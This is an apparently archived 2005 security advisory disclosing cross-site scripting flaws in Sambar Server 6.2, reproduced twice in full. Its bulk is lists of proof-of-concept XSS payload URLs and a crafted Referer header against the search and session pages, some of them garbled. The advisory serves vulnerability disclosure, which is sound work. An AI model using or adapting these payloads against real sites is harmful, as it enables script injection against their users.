jamie fisher
2005-05-23 21:02:29 UTC
- Sambar -
AFFECTED PRODUCTS:
==================
Sambar Server 6.2
http://www.sambar.com/
OVERVIEW:
=========
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.
HISTORY:
========
17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available
DETAILS:
========
Multiple XSS found in the administrative interface.
In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied
input. A user can input a specially crafted script that when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site.
ISSUE:
======
Crafted input of causes the application to output what is known as a Cross Site Script. The script is rendered upon visitation to the affected the page served by the application.
EXAMPLE:
========
Standard XSS within the /search directory:
==========================================
1.
">alert("XSS")&style=fancy&spage=10&query=Folder%name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2.
%22%27>&style=fancy&spage=10&query=Folder%name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3.
">alert("XSS")&style=fancy&spage=20&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4.
%22%27>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5.
">alert("XSS")&style=fancy&spage=30&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6.
%22%27>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7.
">alert("XSS")&style=fancy&spage=40&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8.
%22%27>&style=fancy&spage=40&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9.
">alert("XSS")&style=fancy&spage=50&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10.
%22%27>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11.
">alert("XSS")&style=fancy&spage=60&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12.
%22%27>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name
Standard XSS within the /session directory:
===========================================
1.
'>alert('XSS')http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.
">alert("XSS")http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.
%22%27>http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
HTML XSS within the /search directory:
======================================
1.
"'>&style=fancy&spage=10&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2.
"'>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3.
"'>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4.
"'>http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5.
"'>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6.
"'>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
No chevron '<' '>' XSS within the /search directory:
====================================================
1.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name
Escaping from HTML XSS within the /session directory:
====================================================
1.
alert(%27XSS%27)http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>
Including XSS within referrer:
==============================
1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script>
SOLUTION:
=========
Sambar Server has been contacted and has released patches.
Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :)
REFERENCE:
==========
http://www.sambar.com/security.htm
http://homepage.hispeed.ch/spamtrap/sambar62p.exe
CREDITS:
========
Tod Sambar for understanding the issue and resolving in a timely manner.
This vulnerability was discovered and researched by Jamie Fisher
mail: contact_jamie_fisher[at]yahoo.co.uk
---------------------------------
Yahoo! Messenger NEW - crystal clear PC to PCcalling worldwide with voicemail
AFFECTED PRODUCTS:
==================
Sambar Server 6.2
http://www.sambar.com/
OVERVIEW:
=========
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.
HISTORY:
========
17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available
DETAILS:
========
Multiple XSS found in the administrative interface.
In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied
input. A user can input a specially crafted script that when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site.
ISSUE:
======
Crafted input of causes the application to output what is known as a Cross Site Script. The script is rendered upon visitation to the affected the page served by the application.
EXAMPLE:
========
Standard XSS within the /search directory:
==========================================
1.
">alert("XSS")&style=fancy&spage=10&query=Folder%name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2.
%22%27>&style=fancy&spage=10&query=Folder%name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3.
">alert("XSS")&style=fancy&spage=20&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4.
%22%27>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5.
">alert("XSS")&style=fancy&spage=30&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6.
%22%27>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7.
">alert("XSS")&style=fancy&spage=40&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8.
%22%27>&style=fancy&spage=40&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9.
">alert("XSS")&style=fancy&spage=50&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10.
%22%27>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11.
">alert("XSS")&style=fancy&spage=60&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12.
%22%27>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name
Standard XSS within the /session directory:
===========================================
1.
'>alert('XSS')http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.
">alert("XSS")http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.
%22%27>http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
HTML XSS within the /search directory:
======================================
1.
"'>&style=fancy&spage=10&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2.
"'>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3.
"'>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4.
"'>http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5.
"'>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6.
"'>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
No chevron '<' '>' XSS within the /search directory:
====================================================
1.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name
Escaping from HTML XSS within the /session directory:
====================================================
1.
alert(%27XSS%27)http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>
Including XSS within referrer:
==============================
1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script>
SOLUTION:
=========
Sambar Server has been contacted and has released patches.
Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :)
REFERENCE:
==========
http://www.sambar.com/security.htm
http://homepage.hispeed.ch/spamtrap/sambar62p.exe
CREDITS:
========
Tod Sambar for understanding the issue and resolving in a timely manner.
This vulnerability was discovered and researched by Jamie Fisher
mail: contact_jamie_fisher[at]yahoo.co.uk
---------------------------------
Yahoo! Messenger NEW - crystal clear PC to PCcalling worldwide with voicemail